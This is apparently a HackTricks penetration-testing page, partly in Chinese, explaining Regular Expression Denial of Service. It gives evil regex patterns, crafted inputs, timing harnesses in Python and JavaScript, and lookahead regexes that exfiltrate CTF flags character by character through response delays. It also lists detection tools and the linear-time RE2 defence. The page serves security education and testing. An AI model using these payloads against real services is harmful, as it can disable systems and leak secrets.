Regular expression Denial of Service - ReDoS

Reading time: 8 minutes

tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

Regular Expression Denial of Service (ReDoS)

A Regular Expression Denial of Service (ReDoS) happens when someone takes advantage of weaknesses in how regular expressions (a way to search and match patterns in text) work. Sometimes, when regular expressions are used, they can become very slow, especially if the piece of text they're working with gets larger. This slowness can get so bad that it grows really fast with even small increases in the text size. Attackers can use this problem to make a program that uses regular expressions stop working properly for a long time.

The Problematic Regex Naïve Algorithm

Check the details in https://owasp.org/www-community/attacks/Regularexpression_Denial_of_Service-_ReDoS

Engine behavior and exploitability

Most popular engines (PCRE, Java java.util.regex, Python re, JavaScript RegExp) use a backtracking VM. Crafted inputs that create many overlapping ways to match a subpattern force exponential or high-polynomial backtracking.
Some engines/libraries are designed to be ReDoS-resilient by construction (no backtracking), e.g. RE2 and ports based on finite automata that provide worst‑case linear time; using them for untrusted input removes the backtracking DoS primitive. See the references at the end for details.

Evil Regexes

An evil regular expression pattern is that one that can get stuck on crafted input causing a DoS. Evil regex patterns typically contain grouping with repetition and repetition or alternation with overlapping inside the repeated group. Some examples of evil patterns include:

(a+)+
([a-zA-Z]+)*
(a|aa)+
(a|a?)+
(.*a){x} for x > 10

All those are vulnerable to the input aaaaaaaaaaaaaaaaaaaaaaaa!.

Practical recipe to build PoCs

Most catastrophic cases follow this shape:

Prefix that gets you into the vulnerable subpattern (optional).
Long run of a character that causes ambiguous matches inside nested/overlapping quantifiers (e.g., many a, _, or spaces).
A final character that forces overall failure so the engine must backtrack through all possibilities (often a character that won’t match the last token, like !).

Minimal examples:

(a+)+$ vs input "a"*N + "!"
\w*_*\w*$ vs input "v" + "_"*N + "!"

Increase N and observe super‑linear growth.

Quick timing harness (Python)

python

import re, time
pat = re.compile(r'(\w*_)\w*$')
for n in [2**k for k in range(8, 15)]:
s = 'v' + '_'*n + '!'
t0=time.time(); pat.search(s); dt=time.time()-t0
print(n, f"{dt:.3f}s")

ReDoS 载荷

通过 ReDoS 的字符串外泄

在 CTF（或 bug bounty）中，你可能会 控制用于匹配敏感信息（flag）的 Regex。然后，当 Regex 匹配 时，让页面 冻结（超时或更长的处理时间），而在未匹配时不冻结，可能会很有用。这样你就能够逐字符 exfiltrate 字符串：

在 this post 中你可以找到这个 ReDoS 规则：^(?=<flag>)((.*)*)*salt$
示例：^(?=HTB{sOmE_fl§N§)((.*)*)*salt$
在 this writeup 中你可以找到这个：<flag>(((((((.*)*)*)*)*)*)*)!
在 this writeup 中他使用了：^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$

ReDoS 控制输入和 Regex

下面是一些 ReDoS 示例，在这些示例中你同时控制 输入和 Regex：

javascript

function check_time_regexp(regexp, text) {
var t0 = new Date().getTime()
new RegExp(regexp).test(text)
var t1 = new Date().getTime()
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
;[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$", //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach((regexp) => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/

语言/引擎注意事项（针对攻击者）

JavaScript (browser/Node): 内置的 RegExp 是回溯引擎，当 regex+input 都受攻击者影响时通常可被利用。
Python: re 使用回溯。长时间的模糊匹配序列加上失败的尾部常常导致灾难性回溯。
Java: java.util.regex 使用回溯。如果你只控制输入，寻找使用复杂校验器的端点；如果你控制 patterns（例如存储的规则），ReDoS 通常很容易实现。
像 RE2/RE2J/RE2JS 或 Rust regex crate 这样的引擎被设计为避免灾难性回溯。如果遇到这些引擎，应该关注其他瓶颈（例如过大的 patterns）或寻找仍在使用回溯引擎的组件。

工具

https://github.com/doyensec/regexploit
查找易受攻击的 regexes 并自动生成恶意输入。示例：
pip install regexploit
交互式分析单个 pattern：regexploit
扫描 Python/JS 代码中的 regexes：regexploit-py path/ 和 regexploit-js path/
https://devina.io/redos-checker
https://github.com/davisjam/vuln-regex-detector
端到端管道，用于从项目中提取 regexes、检测易受攻击的模式，并在目标语言中验证 PoC。适用于在大型代码库中搜寻。
https://github.com/tjenkinson/redos-detector
简单的 CLI/JS 库，能分析回溯行为并报告某个 pattern 是否安全。

提示：当你仅能控制输入时，生成长度成倍增长的字符串（例如 2^k 个字符）并追踪延迟。延迟的指数增长强烈表明存在可利用的 ReDoS。

参考资料

https://owasp.org/www-community/attacks/Regularexpression_Denial_of_Service-_ReDoS
https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets
https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20@%20DEKRA%20CTF%202022/solver/solver.html
https://ctftime.org/writeup/25869
SoK (2024)：关于 Regular Expression Denial of Service (ReDoS) 的文献与工程综述 — https://arxiv.org/abs/2406.11618
Why RE2 (线性时间 regex 引擎) — https://github.com/google/re2/wiki/WhyRE2

tip

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。